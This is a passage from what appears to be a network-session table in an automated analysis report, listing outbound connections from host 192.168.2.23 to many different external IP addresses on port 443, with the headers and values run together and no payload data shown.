                                          23515192.168.2.2359010200.62.225.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23516192.168.2.2353064216.1.184.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23517192.168.2.2353718220.145.0.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23518192.168.2.2334102160.65.230.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23519192.168.2.233801454.200.203.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23520192.168.2.2343156197.93.202.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23521192.168.2.2345108136.97.13.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23522192.168.2.2341488223.154.212.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23523192.168.2.235622813.68.15.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23524192.168.2.2351062216.35.113.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23525192.168.2.2346594138.192.51.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23526192.168.2.236079670.101.70.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23527192.168.2.2340152110.18.186.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23528192.168.2.2338262160.240.68.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23529192.168.2.2355920207.248.102.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23530192.168.2.2358148151.102.217.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23531192.168.2.2348406171.224.17.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23532192.168.2.2335156221.61.177.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23533192.168.2.234416478.13.87.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23534192.168.2.235275869.152.175.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23535192.168.2.23596381.129.71.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23536192.168.2.234337219.142.241.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23537192.168.2.2336964159.29.187.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23538192.168.2.235616450.39.252.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23539192.168.2.233780285.74.63.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23540192.168.2.2332896151.77.148.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23541192.168.2.233428234.2.42.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23542192.168.2.235054289.84.245.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23543192.168.2.2345096205.181.43.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23544192.168.2.2337520120.36.107.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23545192.168.2.2348512223.251.199.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23546192.168.2.2355474165.147.142.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23547192.168.2.2346740167.40.189.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23548192.168.2.235692439.13.89.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23549192.168.2.2334464131.231.29.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23550192.168.2.2344842102.245.57.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23551192.168.2.234680851.206.236.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23552192.168.2.2350218152.15.221.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23553192.168.2.235526079.23.190.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23554192.168.2.233422441.49.154.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23555192.168.2.2341936118.229.54.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23556192.168.2.233588075.255.42.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23557192.168.2.2351492163.147.238.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23558192.168.2.2337394153.78.39.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23559192.168.2.2352840182.160.251.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23560192.168.2.235085653.3.232.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23561192.168.2.2354096170.6.122.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23562192.168.2.2342192136.95.179.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23563192.168.2.235879014.45.220.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23564192.168.2.2336078113.189.86.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23565192.168.2.233417861.199.222.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23566192.168.2.2340246110.183.109.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23567192.168.2.234809841.56.121.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23568192.168.2.2347096167.72.27.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23569192.168.2.234123260.58.234.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23570192.168.2.2355524184.196.167.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23571192.168.2.2356646178.91.174.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23572192.168.2.2339870129.37.3.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23573192.168.2.233520038.29.40.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23574192.168.2.23556829.25.98.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23575192.168.2.235957042.205.225.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23576192.168.2.2360574169.25.160.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23577192.168.2.234290244.63.82.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23578192.168.2.23583789.136.151.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23579192.168.2.23434421.184.117.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23580192.168.2.234567848.194.234.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23581192.168.2.2341316102.67.38.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23582192.168.2.2346226125.152.159.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23583192.168.2.2343070223.193.48.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23584192.168.2.235684632.174.23.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23585192.168.2.234907444.166.207.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23586192.168.2.2341228151.32.231.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23587192.168.2.235010859.225.179.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23588192.168.2.234244075.204.236.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23589192.168.2.235301266.132.164.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23590192.168.2.2360236211.24.192.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23591192.168.2.2334284207.68.19.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23592192.168.2.234618076.37.201.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23593192.168.2.236058268.65.195.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23594192.168.2.2353596211.66.245.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23595192.168.2.2349592149.59.51.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23596192.168.2.2335468180.67.249.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23597192.168.2.2351696128.186.127.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23598192.168.2.2360336212.72.182.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23599192.168.2.234155488.27.120.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23600192.168.2.2334070206.64.207.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23601192.168.2.233581654.127.144.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23602192.168.2.233405477.217.134.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23603192.168.2.2352970207.12.156.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23604192.168.2.2345856181.241.71.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23605192.168.2.2353100193.184.65.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23606192.168.2.2346014198.114.202.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23607192.168.2.235436293.85.69.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23608192.168.2.234835817.86.13.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23609192.168.2.2336736220.13.216.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23610192.168.2.2357582113.66.173.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23611192.168.2.2352626199.238.54.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23612192.168.2.2340928121.37.245.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23613192.168.2.2341382117.162.214.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23614192.168.2.2344886195.55.110.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23615192.168.2.2345064140.175.28.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23616192.168.2.2339396110.214.41.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23617192.168.2.234024624.118.129.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23618192.168.2.2357466136.71.49.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23619192.168.2.2358354123.224.153.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23620192.168.2.2347632177.161.76.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23621192.168.2.2346986177.82.122.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23622192.168.2.2353356126.212.75.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23623192.168.2.2339016165.168.0.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23624192.168.2.2333640213.220.209.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23625192.168.2.2338204201.187.214.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23626192.168.2.2333492151.229.59.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23627192.168.2.2337606124.143.149.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23628192.168.2.233321865.160.253.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23629192.168.2.2344552122.83.224.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23630192.168.2.2340698175.30.222.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23631192.168.2.234596651.67.93.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23632192.168.2.234679484.238.177.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23633192.168.2.2337660210.183.6.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23634192.168.2.2333484176.121.73.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23635192.168.2.233905838.68.26.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23636192.168.2.2355348115.86.132.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23637192.168.2.234892240.34.107.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23638192.168.2.2350512222.133.52.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23639192.168.2.2351528195.244.52.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23640192.168.2.235841298.17.112.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23641192.168.2.2336550144.17.66.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23642192.168.2.2343534106.118.9.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23643192.168.2.234090840.154.241.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23644192.168.2.2355718119.49.5.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23645192.168.2.2351716106.15.201.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23646192.168.2.2337282187.78.95.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23647192.168.2.2351484124.116.113.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23648192.168.2.234396245.115.58.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23649192.168.2.2335246204.197.70.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23650192.168.2.2339392193.185.45.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23651192.168.2.234793860.115.90.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23652192.168.2.2336986192.84.214.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23653192.168.2.233621283.22.34.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23654192.168.2.233381698.110.110.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23655192.168.2.2341498221.102.18.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23656192.168.2.2337022221.143.0.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23657192.168.2.2334056112.117.162.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23658192.168.2.233704282.50.230.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23659192.168.2.2345080131.221.54.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23660192.168.2.235273661.58.64.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23661192.168.2.234878693.130.156.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23662192.168.2.2335844124.73.195.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23663192.168.2.2342906222.112.115.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23664192.168.2.234235691.15.47.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23665192.168.2.234494483.112.5.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23666192.168.2.2351572196.223.75.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23667192.168.2.2345264117.145.195.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23668192.168.2.233608299.33.11.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23669192.168.2.2339484115.160.114.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23670192.168.2.2334874118.173.179.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23671192.168.2.233852481.78.231.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23672192.168.2.234961214.65.184.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23673192.168.2.2356036128.158.178.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23674192.168.2.2339212178.137.116.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23675192.168.2.234489072.26.207.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23676192.168.2.2355022182.254.156.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23677192.168.2.2337768162.154.115.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23678192.168.2.235177280.135.18.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23679192.168.2.234775858.104.118.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23680192.168.2.2356562167.179.231.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23681192.168.2.235735614.36.213.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23682192.168.2.2349210126.164.158.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23683192.168.2.235736657.122.97.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23684192.168.2.2357912199.12.142.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23685192.168.2.2336856114.2.218.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23686192.168.2.233968025.69.222.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23687192.168.2.2336934185.167.56.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23688192.168.2.233487427.224.120.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23689192.168.2.2353692131.110.97.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23690192.168.2.235376813.192.8.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23691192.168.2.233394486.95.89.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23692192.168.2.2358338120.68.10.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23693192.168.2.2353058175.58.35.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23694192.168.2.2346956151.137.138.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23695192.168.2.234735280.24.73.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23696192.168.2.233562212.7.34.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23697192.168.2.234212263.233.82.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23698192.168.2.2337012158.205.182.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23699192.168.2.2356330116.231.90.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23700192.168.2.2339068143.199.89.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23701192.168.2.234241652.224.58.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23702192.168.2.2352474146.29.45.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23703192.168.2.2337776161.215.227.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23704192.168.2.234811079.30.164.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23705192.168.2.234025486.14.252.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23706192.168.2.2359220201.96.170.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23707192.168.2.234785290.99.64.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23708192.168.2.234056845.157.172.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23709192.168.2.233554065.233.45.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23710192.168.2.2355258121.137.149.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23711192.168.2.2341194185.13.136.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23712192.168.2.234116019.22.49.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23713192.168.2.2359816174.15.109.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23714192.168.2.2355594165.170.248.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23715192.168.2.2352132168.10.141.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23716192.168.2.233596265.167.180.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23717192.168.2.2356470200.52.90.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23718192.168.2.2349418173.160.184.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23719192.168.2.2340836130.20.9.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23720192.168.2.23579709.223.1.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23721192.168.2.234216218.178.126.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23722192.168.2.233977458.138.143.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23723192.168.2.2334420188.194.186.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23724192.168.2.234221285.181.106.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23725192.168.2.2360076159.171.22.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23726192.168.2.2360480135.223.189.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23727192.168.2.234804280.178.251.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23728192.168.2.233563089.23.182.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23729192.168.2.2348442141.16.20.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23730192.168.2.235552671.252.181.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23731192.168.2.2335264148.6.76.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23732192.168.2.2333190211.136.133.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23733192.168.2.2340214104.62.208.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23734192.168.2.234658865.112.172.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23735192.168.2.234446259.164.87.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23736192.168.2.234209213.0.149.88443
                                          TimestampBytes transferredDirectionData


